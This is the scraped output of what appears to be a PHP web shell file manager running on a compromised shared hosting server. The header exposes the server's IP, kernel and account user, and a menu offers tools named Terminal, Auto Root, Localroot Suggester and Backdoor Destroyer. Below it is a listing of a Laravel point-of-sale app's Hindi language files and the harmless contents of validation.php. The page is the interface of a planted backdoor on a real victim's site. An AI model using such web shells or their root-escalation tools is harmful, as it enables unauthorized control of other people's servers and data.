Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oishifashion /
ap.tsgbd.com /
aa /
lang /
hi /
Delete
Unzip
Name
Size
Permission
Date
Action
account.php
3.34
KB
-rw-r--r--
2025-02-06 04:37
auth.php
773
B
-rw-r--r--
2025-02-06 04:37
barcode.php
3.26
KB
-rw-r--r--
2025-02-06 04:37
brand.php
896
B
-rw-r--r--
2025-02-06 04:37
business.php
5.97
KB
-rw-r--r--
2025-02-06 04:37
cash_register.php
1.54
KB
-rw-r--r--
2025-02-06 04:37
category.php
1.06
KB
-rw-r--r--
2025-02-06 04:37
contact.php
2.09
KB
-rw-r--r--
2025-02-06 04:37
expense.php
2.02
KB
-rw-r--r--
2025-02-06 04:37
home.php
1.09
KB
-rw-r--r--
2025-02-06 04:37
invoice.php
4.21
KB
-rw-r--r--
2025-02-06 04:37
lang_v1.php
135.56
KB
-rw-r--r--
2025-02-06 04:37
messages.php
2.37
KB
-rw-r--r--
2025-02-06 04:37
pagination.php
549
B
-rw-r--r--
2025-02-06 04:37
passwords.php
1.15
KB
-rw-r--r--
2025-02-06 04:37
printer.php
1.38
KB
-rw-r--r--
2025-02-06 04:37
product.php
3.73
KB
-rw-r--r--
2025-02-06 04:37
purchase.php
3.96
KB
-rw-r--r--
2025-02-06 04:37
receipt.php
956
B
-rw-r--r--
2025-02-06 04:37
report.php
4.7
KB
-rw-r--r--
2025-02-06 04:37
restaurant.php
7
KB
-rw-r--r--
2025-02-06 04:37
role.php
5.1
KB
-rw-r--r--
2025-02-06 04:37
sale.php
3.41
KB
-rw-r--r--
2025-02-06 04:37
stock_adjustment.php
1.27
KB
-rw-r--r--
2025-02-06 04:37
tax_rate.php
1.35
KB
-rw-r--r--
2025-02-06 04:37
tooltip.php
14.35
KB
-rw-r--r--
2025-02-06 04:37
unit.php
823
B
-rw-r--r--
2025-02-06 04:37
user.php
2.45
KB
-rw-r--r--
2025-02-06 04:37
validation.php
8.34
KB
-rw-r--r--
2025-02-06 04:37
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Validation Language Lines |-------------------------------------------------------------------------- | | The following language lines contain the default error messages used by | the validator class. Some of these rules have multiple versions such | as the size rules. Feel free to tweak each of these messages here. | */ 'accepted' => ':attribute को स्वीकार किया जाना चाहिए।', 'active_url' => ':attribute एक मान्य URL नहीं है।', 'after' => ':attribute, :date के बाद की एक तारीख होनी चाहिए।', 'alpha' => ':attribute में केवल अक्षर हो सकते हैं।', 'alpha_dash' => ':attribute में केवल अक्षर, संख्या, और डैश हो सकते हैं।', 'alpha_num' => ':attribute में केवल अक्षर और संख्याएं हो सकती हैं।', 'array' => ':attribute एक सरणी होनी चाहिए।', 'before' => ':attribute, :date से पहले की एक तारीख होनी चाहिए।', 'between' => [ 'numeric' => ':attribute, :min और :max के बीच होना चाहिए।', 'file' => ':attribute, :min और :max किलोबाइट के बीच होना चाहिए।', 'string' => ':attribute, :min और :max वर्णों के बीच होना चाहिए।', 'array' => ':attribute, :min और :max आइटमों के बीच होनी चाहिए।', ], 'boolean' => ':attribute फील्ड सही या गलत होना चाहिए।', 'confirmed' => ':attribute पुष्टिकरण मेल नहीं खा रहा है।', 'date' => ':attribute एक मान्य दिनांक नहीं है।', 'date_format' => ':attribute फॉर्मेट :format से मेल नहीं खा रहा है।', 'different' => ':attribute और :other अलग होना चाहिए।', 'digits' => ':attribute, :digits अंक होना चाहिए।', 'digits_between' => ':attribute, :min और :max अंकों के बीच होना चाहिए।', 'distinct' => ':attribute फील्ड का एक डुप्लिकेट मान होता है।', 'email' => ':attribute एक मान्य ईमेल पता होना चाहिए।', 'exists' => 'चुना गया :attribute अमान्य है।', 'filled' => ':attribute फील्ड आवश्यक होता है।', 'image' => ':attribute एक छवि होनी चाहिए।', 'in' => 'चुना गया :attribute अमान्य है।', 'in_array' => ':attribute फील्ड, :other में मौजूद नहीं है।', 'integer' => ':attribute एक पूर्णांक होना चाहिए।', 'ip' => ':attribute एक मान्य IP पता होना चाहिए।', 'ipv4' => 'The :attribute must be a valid IPv4 address.', 'ipv6' => 'The :attribute must be a valid IPv6 address.', 'json' => ':attribute एक मान्य JSON स्ट्रिंग होना चाहिए।', 'max' => [ 'numeric' => ':attribute, :max से बड़ा नहीं हो सकता है।', 'file' => ':attribute :max किलोबाइट से बड़ा नहीं हो सकता है।', 'string' => ':attribute, :max वर्णों से बड़ा नहीं हो सकता है।', 'array' => ':attribute, :max आइटमों से अधिक नहीं हो सकता है।', ], 'mimes' => ':attribute एक प्रकार की फ़ाइल: :values होना चाहिए।', 'min' => [ 'numeric' => ':attribute कम से कम :min होना चाहिए।', 'file' => ':attribute कम से कम :min किलोबाइट होना चाहिए।', 'string' => ':attribute कम से कम :min वर्ण होना चाहिए।', 'array' => ':attribute कम से कम :min आइटम होना चाहिए।', ], 'not_in' => 'चुना गया :attribute अमान्य है।', 'numeric' => ':attribute एक संख्या होनी चाहिए।', 'present' => ':attribute फील्ड मौजूद होना चाहिए।', 'regex' => ':attribute फॉर्मेट अमान्य है।', 'required' => ':attribute फील्ड आवश्यक होता है।', 'required_if' => ':attribute फ़ील्ड आवश्यक होता है जब :other :value होता है।', 'required_unless' => ':attribute फील्ड आवश्यक होता है जब :other, :values में नहीं होता है।', 'required_with' => ':attribute फ़ील्ड आवश्यक होता है जब :values मौजूद होता है।', 'required_with_all' => ':attribute फ़ील्ड आवश्यक होता है जब :values मौजूद होता है।', 'required_without' => ':attribute फील्ड आवश्यक होता है जब :values मौजूद नहीं होता है।', 'required_without_all' => ':attribute फील्ड आवश्यक होता है जब एक भी :values मौजूद नहीं होता है।', 'same' => ':attribute और :other मेल खाना चाहिए।', 'size' => [ 'numeric' => ':attribute, :size होना चाहिए।', 'file' => ':attribute, :size किलोबाइट होना चाहिए।', 'string' => ':attribute, :size वर्ण होना चाहिए।', 'array' => ':attribute में :size आइटम होने चाहिए।', ], 'string' => ':attribute एक स्ट्रिंग होनी चाहिए।', 'timezone' => ':attribute एक मान्य क्षेत्र होना चाहिए।', 'unique' => ':attribute को पहले ही ले लिया गया है।', 'url' => ':attribute फॉर्मेट अमान्य है।', /* |-------------------------------------------------------------------------- | Custom Validation Language Lines |-------------------------------------------------------------------------- | | Here you may specify custom validation messages for attributes using the | convention "attribute.rule" to name the lines. This makes it quick to | specify a specific custom language line for a given attribute rule. | */ 'custom' => [ 'attribute-name' => [ 'rule-name' => 'अनुकूल-संदेश', ], ], /* |-------------------------------------------------------------------------- | Custom Validation Attributes |-------------------------------------------------------------------------- | | The following language lines are used to swap attribute place-holders | with something more reader friendly such as E-Mail Address instead | of "email". This simply helps us make messages a little cleaner. | */ 'attributes' => [ 'test_name' => 'टेस्ट का नाम', 'test_description' => 'टेस्ट का विवरण', 'test_locale' => 'भाषा', 'image' => 'छवि', 'result_text_under_image' => 'छवि के नीचे परिणाम पाठ', 'short_text' => 'लघु पाठ', ], 'custom-messages' => [ 'quantity_not_available' => 'केवल :qty :unit उपलब्ध', 'this_field_is_required' => 'यह फ़ील्ड आवश्यक है', ], ];